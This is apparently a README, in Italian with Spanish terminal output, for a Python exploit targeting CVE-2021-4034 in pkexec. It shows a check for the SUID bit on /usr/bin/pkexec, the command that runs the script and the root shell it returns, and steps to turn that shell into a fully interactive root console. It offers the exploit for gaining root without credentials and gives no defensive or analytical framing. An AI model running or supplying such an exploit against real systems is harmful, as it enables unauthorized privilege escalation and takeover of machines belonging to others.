
Script in Python sulla vulnerabilità CVE-2021-4034
CVE-2021-4034 (pkexec) L'uso di questo script in Python sfrutta la vulnerabilità nel file pkexec per ottenere accesso root senza fornire credenziali
· Rileva se il binario ha i privilegi SUID, in questo caso è vulnerabile
usuario@gatogamer $ ls -la /usr/bin/pkexec
.rwsr-xr-x 1 root root /usr/bin/pkexec
usuario@gatogamer $
· Esegue l'exploit per ottenere accesso root, in questo caso è sufficiente eseguirlo con python3, alla fine avrai una console come root
usuario@gatogamer $ python3 CVE-2021-4034.py
[+] Iniciando el exploit
[+] Exploit Completado
# whoami
root
#
· Come complemento, puoi cambiare il valore di TERM, può essere 'xterm' o 'xterm-256color' per una migliore estetica, inoltre eseguire una shell diversa come 'bash' o 'zsh', ora abbiamo una console completamente interattiva
# export TERM=xterm-256color
# zsh
root@gatogamer $